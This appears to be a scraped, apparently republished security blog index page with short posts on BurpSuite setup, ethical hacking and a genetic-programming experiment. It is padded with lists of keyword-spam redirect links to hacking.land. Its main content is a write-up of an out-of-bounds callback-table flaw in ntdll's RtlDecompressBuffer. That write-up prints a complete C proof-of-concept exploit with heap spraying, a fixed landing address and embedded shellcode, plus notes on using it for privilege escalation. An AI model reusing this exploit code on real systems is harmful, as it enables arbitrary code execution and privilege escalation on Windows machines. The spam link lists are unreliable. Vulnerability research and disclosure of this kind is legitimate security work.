Ngak Ngik Nguk

BurpSuite Introduction & Installation

<div dir="ltr" style="text-align: left;" trbidi="on"> What is BurpSuite? Burp Suite is a Java based Web Penetration Testing framework. It has become an industry standard suite of tools used by information security professionals. Burp Suite helps you identify vulnerabilities and verify attack vectors that are affecting web applications. Because of its popularity and breadth as well as depth of features, we have created this useful page as a collection of Burp Suite knowledge and information. In its simplest form, Burp Suite can be classified as an Interception Proxy. While browsing their target application, a penetration tester can configure their internet browser to route traffic through the Burp Suite proxy server. Burp Suite then acts as a (sort of) Man In The Middle by capturing and analyzing each request to and from the target web application so that they can be analyzed. <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQfnhsX-Crqgf_qKwEeWOvjNn00RmHEXDG9KxagHTQLz8ogwl6yrndoF5VIvSxpGVEMxQNDu-Yb5aZ6ngLM0WQh9XRtKVtSic1rInyCB6I-C2d0CPuPU6B2V7gwz2W___FvfE6ZrqDL9Q/s1600/tumblr_np71m42bXR1qedb29o1_400.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="234" data-original-width="400" height="187" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQfnhsX-Crqgf_qKwEeWOvjNn00RmHEXDG9KxagHTQLz8ogwl6yrndoF5VIvSxpGVEMxQNDu-Yb5aZ6ngLM0WQh9XRtKVtSic1rInyCB6I-C2d0CPuPU6B2V7gwz2W___FvfE6ZrqDL9Q/s320/tumblr_np71m42bXR1qedb29o1_400.gif" width="320" /></a></div> Everyone has their favorite security tools, but when it comes to mobile and web applications I've always found myself looking BurpSuite . It always seems to have everything I need and for folks just getting started with web application testing it can be a challenge putting all of the pieces together. I'm just going to go through the installation to paint a good picture of how to get it up quickly. BurpSuite is freely available with everything you need to get started and when you're ready to cut the leash, the professional version has some handy tools that can make the whole process a little bit easier. I'll also go through how to install FoxyProxy which makes it much easier to change your proxy setup, but we'll get into that a little later. Requirements and assumptions: Mozilla Firefox 3.1 or Later Knowledge of Firefox Add-ons and installation The Java Runtime Environment installed Download BurpSuite from http://portswigger.net/burp/download.htmland make a note of where you save it. on for Firefox from   https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/ If this is your first time running the JAR file, it may take a minute or two to load, so be patient and wait. Video for setup and installation. <div class="separator" style="clear: both; text-align: center;"><iframe width="320" height="266" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/JRao1oHXYqk/0.jpg" src="https://www.youtube.com/embed/JRao1oHXYqk?feature=player_embedded" frameborder="0" allowfullscreen></iframe></div> You need to install compatible version of java , So that you can run BurpSuite.</div>More information <ul><li> <a href="https://www.google.jo/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fwww.hacking.land%2F2020%2F02%2Fwindows-10-ya-te-permite-dejar-de.html ">Hacking Ético Con Herramientas Python Pdf </a></li><li> <a href="https://www.google.cm/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fwww.hacking.land%2F2020%2F02%2Fmini-led-y-microled-son-las-diferencias.html ">Penetration Testing A Hands-On Introduction To Hacking </a></li><li> <a href="https://www.google.si/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fvideos.hacking.land%2F2018%2F06%2Fel-mejor-dispositivo-para-almacenar-tus.html ">Hacking 2019 </a></li><li> <a href="https://www.google.ru/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fvideos.hacking.land%2F2019%2F02%2Fencryptpad-poc-cifrado-de-ficheros-de.html ">Ultimate Hacking Keyboard </a></li><li> <a href="https://search.yahoo.com/search?p=site%3Ahacking.land&fr=yfp-t&fp=1&toggle=1&cop=mss&ei=UTF-8&fp=1&b=441&pz=10&bct=0&xargs=0 ">Chema Alonso Wikipedia </a></li><li> <a href="https://www.google.qa/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fwww.hacking.land%2F2020%2F05%2Fprivacidad-y-desinformaci-as-como_4.html ">Tipos De Hacker </a></li><li> <a href="https://www.google.tk/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fwww.hacking.land%2F2020%2F02%2Fhomepwn-c-resolver-el-ctf-ble-de.html ">Curso Completo De Hacking Ético </a></li><li> <a href="https://www.google.pt/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fwww.hacking.land%2F2020%2F02%2Fcve-api-parse-filter-latest-cves-from.html ">Ethical Hacking </a></li><li> <a href="https://www.google.tg/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fvideos.hacking.land%2F2019%2F02%2Fconfigurar-firewall-en-kali-linux.html ">Hacking 2018 </a></li><li> <a href="https://www.google.dm/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fwww.hacking.land%2F2020%2F02%2F5-zero-days-en-cisco-discovery-protocol.html ">Blog Seguridad Informática </a></li><li> <a href="https://www.google.ro/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fvideos.hacking.land%2F2019%2F10%2Fairdrop-crazy-poc.html ">Que Hace Un Hacker </a></li></ul>

BurpSuite Introduction & Installation

What is BurpSuite? Burp Suite is a Java based Web Penetration Testing framework. It has become an industry standard suite of tools used by i...

Baca selengkapnya »

RtlDecompresBuffer Vulnerability

Introduction The RtlDecompressBuffer is a WinAPI implemented on ntdll that is often used by browsers and applications and also by malware to decompress buffers compressed on LZ algorithms for example LZNT1. The first parameter of this function is a number that represents the algorithm to use in the decompression, for example the 2 is the LZNT1. This algorithm switch is implemented as a callback table with the pointers to the algorithms, so the boundaries of this table must be controlled for avoiding situations where the execution flow is redirected to unexpected places, specially controlled heap maps. The algorithms callback table <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi55LjDpL4hM4cWQePmgjoGKK-1JY8mjPvGsTz1a6o9R4cPT_bRl7987-2rZ7yAeqRjTEfGCoV8BcUJfKRUmwi08z4odYVTR1zSdavJ66aO8bknEuLgp7CgyvRYzDPiivFBfVoImlf8ruM/s1600/algorithm_table.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" height="70" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi55LjDpL4hM4cWQePmgjoGKK-1JY8mjPvGsTz1a6o9R4cPT_bRl7987-2rZ7yAeqRjTEfGCoV8BcUJfKRUmwi08z4odYVTR1zSdavJ66aO8bknEuLgp7CgyvRYzDPiivFBfVoImlf8ruM/s400/algorithm_table.png" width="400" /></a> Notice the five nops at the end probably for adding new algorithms in the future. The way to jump to this pointers depending on the algorithm number is: call RtlDecompressBufferProcs[eax*4] The bounrady checks We control eax because is the algorithm number, but the value of eax is limited, let's see the boudary checks: <pre></pre><pre></pre><pre></pre> <div style="background: #202020; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0;">int RtlDecompressBuffer(unsigned __int8 algorithm, int a2, int a3, int a4, int a5, int a6) { int result; // eax@4 if ( algorithm & algorithm != 1 ) { if ( algorithm & 0xF0 ) result = -1073741217; else result = ((int (__stdcall *)(int, int, int, int, int))RtlDecompressBufferProcs[algorithm])(a2, a3, a4, a5, a6); } else { result = -1073741811; } return result; }</pre></div> <div style="text-align: justify;">Regarding that decompilation seems that we can only select algorithm number from 2 to 15, regarding that  the algorithm 9 is allowed and will jump to 0x90909090, but we can't control that addess.</div><div style="text-align: justify;"> </div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgK2fgYgFOjpNdUh4M4BMAr78whgzG3-3Tbrruud03QEryj85XVRV9cDgJBXNxvB3P2TzzL0TQg0dUZs2M9Ud-GEtB7kpapNiZku_JwmMuT5lGiWQF6LcWGHSoch6-hbr-p6fPKTcC76g8/s1600/xplt_algo8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="26" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgK2fgYgFOjpNdUh4M4BMAr78whgzG3-3Tbrruud03QEryj85XVRV9cDgJBXNxvB3P2TzzL0TQg0dUZs2M9Ud-GEtB7kpapNiZku_JwmMuT5lGiWQF6LcWGHSoch6-hbr-p6fPKTcC76g8/s400/xplt_algo8.png" width="400" /></a> let's check the disassembly on Win7 32bits: <ul><li>the movzx limits the boundaries to 16bits</li><li>the test ax, ax avoids the algorithm 0</li><li>the cmp ax, 1 avoids the algorithm 1</li><li>the test al, 0F0h limits the boundary .. wait .. al?</li></ul><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmy8Vdaadw4J2GuRZ7rVKmaJnnf5e7fsckQghZGFhIwQcOLkfUsVkBoMt0EvASxBOLhpObcsvRe7U9H34NJwZ_CJOzu2WZnuEL7Zb4qrOMQAJLM2w3rJbJqyWFnPU89G35vJWYg26K_MU/s1600/checks_asm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="205" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmy8Vdaadw4J2GuRZ7rVKmaJnnf5e7fsckQghZGFhIwQcOLkfUsVkBoMt0EvASxBOLhpObcsvRe7U9H34NJwZ_CJOzu2WZnuEL7Zb4qrOMQAJLM2w3rJbJqyWFnPU89G35vJWYg26K_MU/s400/checks_asm.png" width="400" /></a> Let's calc the max two bytes number that bypass the test al, F0h unsigned int max(void) {         __asm__("xorl %eax, %eax");         __asm__("movb $0xff, %ah");         __asm__("movb $0xf0, %al"); } int main(void) {         printf("max: %u\n", max()); } <div> </div><div>The value is 65520, but the fact is that is simpler than that, what happens if we put the algorithm number 9? </div><div class="separator" style="clear: both; text-align: justify;"> </div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: justify;"> </div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjANV1zBB1DkPreyNMnNR6qsLu027TVHKgWjewSbbQeK_qaiG8Q0Bki-vzgZb20FwgkynsBox8QAFZgpjhOA9TiDglJLrL0y-miM46IkhUSKdOdelE6AMrItpxv6hTwo0orMEg2XK3WHuA/s1600/xplt_algo9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="28" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjANV1zBB1DkPreyNMnNR6qsLu027TVHKgWjewSbbQeK_qaiG8Q0Bki-vzgZb20FwgkynsBox8QAFZgpjhOA9TiDglJLrL0y-miM46IkhUSKdOdelE6AMrItpxv6hTwo0orMEg2XK3WHuA/s400/xplt_algo9.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: justify;"> </div><div class="separator" style="clear: both; text-align: justify;">So if we control the algorithm number we can redirect the execution flow to 0x55ff8890 which can be mapped via spraying.</div><div class="separator" style="clear: both; text-align: justify;"> </div><div class="separator" style="clear: both; text-align: justify;">Proof of concept</div><div class="separator" style="clear: both; text-align: justify;"> </div><div class="separator" style="clear: both; text-align: justify;">This exploit code, tells to the RtlDecompresBuffer to redirect the execution flow to the address 0x55ff8890 where is a map with the shellcode. To reach this address the heap is sprayed creating one Mb chunks to reach this address.</div><div class="separator" style="clear: both; text-align: justify;"> </div><div class="separator" style="clear: both; text-align: justify;">The result on WinXP:</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNdGpeY2-fgQlvggerwzSsTPwPBYKMmVTfztWlPgJwpITCR6Oxq69bzsaeRyszUtVpOYwOc_i7kf_b8awmii0OUxCrnEu2C5ojR0tRVyWBMqlZKIkV9LUj086A5pY3bfeZ5yn00tUgI_4/s1600/calc_xp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="208" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNdGpeY2-fgQlvggerwzSsTPwPBYKMmVTfztWlPgJwpITCR6Oxq69bzsaeRyszUtVpOYwOc_i7kf_b8awmii0OUxCrnEu2C5ojR0tRVyWBMqlZKIkV9LUj086A5pY3bfeZ5yn00tUgI_4/s400/calc_xp.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: left;"> </div><div class="separator" style="clear: both; text-align: left;">The result on Win7 32bits:</div> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiq6uHCd49c-mjv2BNNtLDuFNqEYt9nNoFlrJ6Qd9GWFWTSNAXYazDbmCXK383GSzZsG0hSiX67WyTtww9j9r4NRWQCRbZpLMTCgPsOBtf3bB36jegoT0-VFsWdxVG4pzByTXrDaae5N9M/s1600/calc_win7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="202" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiq6uHCd49c-mjv2BNNtLDuFNqEYt9nNoFlrJ6Qd9GWFWTSNAXYazDbmCXK383GSzZsG0hSiX67WyTtww9j9r4NRWQCRbZpLMTCgPsOBtf3bB36jegoT0-VFsWdxVG4pzByTXrDaae5N9M/s400/calc_win7.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: justify;"> </div><div class="separator" style="clear: both; text-align: justify;">And the exploit code:</div><div class="separator" style="clear: both; text-align: justify;"> </div><div style="background: #202020; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0;">/* ntdll!RtlDecompressBuffer() vtable exploit + heap spray by @sha0coder */ #include #include #include #define KB 1024 #define MB 1024*KB #define BLK_SZ 4096 #define ALLOC 200 #define MAGIC_DECOMPRESSION_AGORITHM 9 // WinXP Calc shellcode from http://shell-storm.org/shellcode/files/shellcode-567.php /* unsigned char shellcode[] = "\xeB\x02\xBA\xC7\x93" "\xBF\x77\xFF\xD2\xCC" "\xE8\xF3\xFF\xFF\xFF" "\x63\x61\x6C\x63"; */ // https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html char *shellcode = "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f" "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" "\x77\x20\x8b\x3f\x80\x7e\x0c\x33" "\x75\xf2\x89\xc7\x03\x78\x3c\x8b" "\x57\x78\x01\xc2\x8b\x7a\x20\x01" "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" "\x45\x81\x3e\x43\x72\x65\x61\x75" "\xf2\x81\x7e\x08\x6f\x63\x65\x73" "\x75\xe9\x8b\x7a\x24\x01\xc7\x66" "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9" "\xb1\xff\x53\xe2\xfd\x68\x63\x61" "\x6c\x63\x89\xe2\x52\x52\x53\x53" "\x53\x53\x53\x53\x52\x53\xff\xd7"; PUCHAR landing_ptr = (PUCHAR)0x55ff8b90; // valid for Win7 and WinXP 32bits void fail(const char *msg) { printf("%s\n\n", msg); exit(1); } PUCHAR spray(HANDLE heap) { PUCHAR map = 0; printf("Spraying ...\n"); printf("Aproximating to %p\n", landing_ptr); while (map < landing_ptr-1*MB) { map = HeapAlloc(heap, 0, 1*MB); } //map = HeapAlloc(heap, 0, 1*MB); printf("Aproximated to [%x - %x]\n", map, map+1*MB); printf("Landing adddr: %x\n", landing_ptr); printf("Offset of landing adddr: %d\n", landing_ptr-map); return map; } void landing_sigtrap(int num_of_traps) { memset(landing_ptr, 0xcc, num_of_traps); } void copy_shellcode(void) { memcpy(landing_ptr, shellcode, strlen(shellcode)); } int main(int argc, char **argv) { FARPROC RtlDecompressBuffer; NTSTATUS ntStat; HANDLE heap; PUCHAR compressed, uncompressed; ULONG compressed_sz, uncompressed_sz, estimated_uncompressed_sz; RtlDecompressBuffer = GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlDecompressBuffer"); heap = GetProcessHeap(); compressed_sz = estimated_uncompressed_sz = 1*KB; compressed = HeapAlloc(heap, 0, compressed_sz); uncompressed = HeapAlloc(heap, 0, estimated_uncompressed_sz); spray(heap); copy_shellcode(); //landing_sigtrap(1*KB); printf("Landing ...\n"); ntStat = RtlDecompressBuffer(MAGIC_DECOMPRESSION_AGORITHM, uncompressed, estimated_uncompressed_sz, compressed, compressed_sz, &uncompressed_sz); switch(ntStat) { case STATUS_SUCCESS: printf("decompression Ok!\n"); break; case STATUS_INVALID_PARAMETER: printf("bad compression parameter\n"); break; case STATUS_UNSUPPORTED_COMPRESSION: printf("unsuported compression\n"); break; case STATUS_BAD_COMPRESSION_BUFFER: printf("Need more uncompressed buffer\n"); break; default: printf("weird decompression state\n"); break; } printf("end.\n"); } </pre></div> <div class="separator" style="clear: both; text-align: justify;">The attack vector</div><pre><pre></pre><div class="separator" style="clear: both; font-family: "Times New Roman"; text-align: justify; white-space: normal;">This API is called very often in the windows system, and also is called by browsers, but he attack vector is not common, because the apps that call this API trend to hard-code the algorithm number, so in a normal situation we don't control the algorithm number. But if there is a privileged application service or a driver that let to switch the algorithm number, via ioctl, config, etc. it can be used to elevate privileges on win7</div><div class="separator" style="clear: both; font-family: "Times New Roman"; text-align: justify; white-space: normal;"></div></pre><h3>Related word</h3> <ol><li> <a href="https://www.google.sh/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fvideos.hacking.land%2F2019%2F11%2Fkubernetes-configuracion-del-plugin-cni.html ">Programas De Hacker </a></li><li> <a href="https://www.google.bs/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fwww.hacking.land%2F2020%2F03%2Fel-club-de-los-poetas-muertos-parte-1.html ">Portatil Para Hacking </a></li><li> <a href="https://www.google.cz/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fvideos.hacking.land%2F2020%2F01%2Fhacking-etico-desde-android-con-termux.html ">Herramientas De Seguridad Informatica </a></li><li> <a href="https://www.google.sn/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fvideos.hacking.land%2F2018%2F04%2Fmicro-historia-el-primer-hackeo-de-la.html ">Hacking Mac </a></li></ol>

RtlDecompresBuffer Vulnerability

Introduction The RtlDecompressBuffer is a WinAPI implemented on ntdll that is often used by browsers and applications and also by malware to...

Baca selengkapnya »

WHAT IS ETHICAL HACKING

<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidCweENh8e2ZUFjxDhqYjqQhwvBC7uBtLalO5KAUdfPSGD_aEz7r8Iwo6L1k9CKwcbRK9aMY5sIljIwIJmPDxt5ctBNo5FjDdli1wOhoINGZbr0LxDHDDL-UjI42jBFA8jTHbcKXyNU-RG/s1600/IMG_20181223_221850.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="395" data-original-width="720" height="175" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidCweENh8e2ZUFjxDhqYjqQhwvBC7uBtLalO5KAUdfPSGD_aEz7r8Iwo6L1k9CKwcbRK9aMY5sIljIwIJmPDxt5ctBNo5FjDdli1wOhoINGZbr0LxDHDDL-UjI42jBFA8jTHbcKXyNU-RG/s320/IMG_20181223_221850.png" width="320"></a></div>What is ethical hacking? </div><div dir="ltr" style="text-align: left;" trbidi="on">Ethical hacking is identifying weakness in computer system and/or computer networks and coming with countermeasures that protect the weakness. Ethical hackers must abide by the following rules- 1-Get written permission from the owner of the computer system and/or computer network before  hacking. 2-Protect the privacy of the organisation been hacked etc. Ethical Hacking and Ethical Hacker are terms used to describe hacking performed by a company or individual to help identity potential threats on a computer or network.</div><div dir="ltr" style="text-align: left;" trbidi="on"> </div><div dir="ltr" style="text-align: left;" trbidi="on"> </div><div dir="ltr" style="text-align: left;" trbidi="on">An Ethical Hacker attempts to byepass system security and search for any weak point that could be exploited by Malicious Hackers.</div><h5>More information</h5> <ol><li> <a href="https://www.google.tg/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fwww.hacking.land%2F2020%2F03%2Flazydocker-lazier-way-to-manage.html ">Aprender Hacking Desde Cero </a></li><li> <a href="https://www.google.ec/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fvideos.hacking.land%2F2018%2F12%2Fcodetalks4devs-joomla-in-paranoid-mode.html ">El Mejor Hacker </a></li><li> <a href="https://www.google.cf/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fvideos.hacking.land%2F2018%2F07%2Fcomo-va-el-verano.html ">Hacking Aves </a></li><li> <a href="https://www.google.ad/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fvideos.hacking.land%2F2018%2F03%2Fcomo-se-ve-un-ataque-dos-desde-la.html ">Hacking Pdf </a></li><li> <a href="https://www.youtube.com/redirect?q=https%3A%2F%2Fvideos.hacking.land%2F2019%2F10%2Fplataforma-data-security.html&event=video_description ">Que Estudiar Para Ser Hacker </a></li><li> <a href="https://www.google.ps/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fvideos.hacking.land%2F2019%2F01%2Fpoc-exploiting-con-metasploit-el-bug-de.html ">Google Hacking </a></li><li> <a href="https://www.google.ee/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fvideos.hacking.land%2F2018%2F12%2Fcodetalks4devs-joomla-in-paranoid-mode.html ">Hacking Food </a></li><li> <a href="https://www.google.nr/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fvideos.hacking.land%2F2019%2F06%2Fsolucion-errores-en-termux-con-tmux.html ">Hacking Social </a></li><li> <a href="https://www.google.si/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fwww.hacking.land%2F2020%2F02%2Fdiario-de-troya-4-el-ransomware-que-dej.html ">Herramientas De Seguridad Informatica </a></li><li> <a href="https://www.google.ki/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fwww.hacking.land%2F2020%2F02%2Fevita-borrar-o-archivar-sin-querer-un.html ">Growth Hacking Definicion </a></li><li> <a href="https://www.google.ng/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fwww.hacking.land%2F2020%2F03%2Fjeopardize-lowzero-cost-threat.html ">Google Hacking Search </a></li><li> <a href="https://www.google.mu/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fwww.hacking.land%2F2020%2F02%2Fc-evitar-que-cualquier-aplicaci-o.html ">Hacking Ético Con Herramientas Python Pdf </a></li><li> <a href="https://www.google.fm/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fwww.hacking.land%2F2020%2F02%2Fc-configurar-y-descargar-archivos-con.html ">Hacker Etico </a></li></ol>

WHAT IS ETHICAL HACKING

What is ethical hacking? Ethical hacking is identifying weakness in computer system and/or computer networks and coming with countermeasures...

Baca selengkapnya »

Evolving Logic Until Pass Tests Automatically

Automating the automation is still a challenge, but in some cases it's possible under certain situations. In 2017 I created logic-evolver, one of my experiments for creating logic automatically or better said evolving logic automatically. In some way, the computer create its own program that satisfies a set of tests defined by a human. <a href="https://github.com/sha0coder/logic-evolver">https://github.com/sha0coder/logic-evolver</a> This implementation in rust, contains a fast cpu emulator than can execute one million instructions in less than two seconds. And a simple genetic algorithm to do the evolution. Here we create the genetic algorithm, and configure a population of 1000 individuals, and the top 5 to crossover. We run the genetic algorithm with 500 cycles maximum. Note that in this case the population are programs initially random until take the correct shape. <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTtAOCtzvTE9FPFoLyhTH7mFWxYQ7jC8RtazexyOSAdNmRMnw-REBo25NO-1hcWVAQvE13PkRqGiOHo42OCiPgpXf-koDjj8hVfyVMGA5GQYGn52HFib-m6_Ur5zUMlz6d4bSmdM6GZ3I/s1600/instanciating+GA.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="126" data-original-width="382" height="131" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTtAOCtzvTE9FPFoLyhTH7mFWxYQ7jC8RtazexyOSAdNmRMnw-REBo25NO-1hcWVAQvE13PkRqGiOHo42OCiPgpXf-koDjj8hVfyVMGA5GQYGn52HFib-m6_Ur5zUMlz6d4bSmdM6GZ3I/s400/instanciating+GA.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"> </div>An evaluation function is provided in the run method as well, and looks like this: <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhafS3yymOKXUe_r5jBN2fIMP8lDuSNivNHmZQyZW3ajOCaGpFsbwkLaTud0b4Gfbl8QJT6jiRoZWvIRg8zvDeNX1yYs7wJM1z5-q-cUKCTyJ_G7q_NOjZt9XndbvRQMNKx0R0lbAP_dzY/s1600/test1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="751" data-original-width="499" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhafS3yymOKXUe_r5jBN2fIMP8lDuSNivNHmZQyZW3ajOCaGpFsbwkLaTud0b4Gfbl8QJT6jiRoZWvIRg8zvDeNX1yYs7wJM1z5-q-cUKCTyJ_G7q_NOjZt9XndbvRQMNKx0R0lbAP_dzY/s400/test1.png" width="262" /></a></div> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyMZYYF7GPVEqvfqcnRT4fEWiLvM6ADAlfRw0DmFoIJkAHB1mTnMRhyotymwRtV1aqA9DdEHsyVyyUB9Ov0vk1Q_-ggPmfd_Oo8AgkPzuVakZHme3B0zFit8zxJMuF3IQEhnUC1fKgiMM/s1600/test2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="520" data-original-width="439" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyMZYYF7GPVEqvfqcnRT4fEWiLvM6ADAlfRw0DmFoIJkAHB1mTnMRhyotymwRtV1aqA9DdEHsyVyyUB9Ov0vk1Q_-ggPmfd_Oo8AgkPzuVakZHme3B0zFit8zxJMuF3IQEhnUC1fKgiMM/s400/test2.png" width="337" /></a></div><div class="separator" style="clear: both; text-align: center;"> </div><div class="separator" style="clear: both; text-align: left;">The evaluation function receives a CPU object, to compute a test you need to set the initial parameters, run the program and set a scoring regarding the return value.</div><div class="separator" style="clear: both; text-align: left;"> </div><div class="separator" style="clear: both; text-align: left;"> </div><a href="https://asciinema.org/a/OLQdHvLgwkO9DpD0CEqlWP4aD" target="_blank"><img src="https://asciinema.org/a/OLQdHvLgwkO9DpD0CEqlWP4aD.svg" /></a><h4>More info</h4> <ol><li> <a href="https://www.google.ec/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fvideos.hacking.land%2F2018%2F10%2Fcodetalks4devs-como-crear-un-plugin-de.html ">Tecnicas De Hacking </a></li><li> <a href="https://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fwww.hacking.land%2F2020%2F02%2Fla-ue-usar-whatsapp-por-el-momento.html ">Hacking With Python </a></li><li> <a href="https://www.google.ae/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fvideos.hacking.land%2F2019%2F02%2Fakinator-un-sistema-experto-convertido.html ">Hacking Google Home Mini </a></li><li> <a href="https://www.google.pn/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fwww.hacking.land%2F2020%2F03%2Fc-implantar-una-pol-de-acceso-remoto.html ">Codigo Hacker </a></li><li> <a href="https://id.search.yahoo.com/search?p=site%3Ahacking.land&fr=yfp-t&fp=1&toggle=1&cop=mss&ei=UTF-8&fp=1&b=241&pz=10&bct=0&xargs=0 ">Web Hacking 101 </a></li><li> <a href="https://www.google.dk/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fvideos.hacking.land%2F2018%2F03%2Ffileless-malware-infections-demo-code.html ">Hacking Etico Curso Gratis </a></li><li> <a href="https://www.google.no/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fwww.hacking.land%2F2020%2F02%2Fvulnerabilidad-en-bombillas-philips-hue.html ">Libros De Hacking Pdf </a></li><li> <a href="https://www.google.so/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fwww.hacking.land%2F2020%2F03%2Fkatana-python-tool-for-google-hacking.html ">Escuela Travel Hacking </a></li><li> <a href="https://www.google.dk/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fvideos.hacking.land%2F2019%2F01%2Ffoca-files-finder-foca-chrome-extension.html ">Ingeniería Social. El Arte Del Hacking Personal Pdf </a></li><li> <a href="https://www.google.sr/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&url=https%3A%2F%2Fvideos.hacking.land%2F2019%2F11%2Fhomepwn-poc-of-nfc-clone.html ">Aprender Hacking Etico </a></li><li> <a 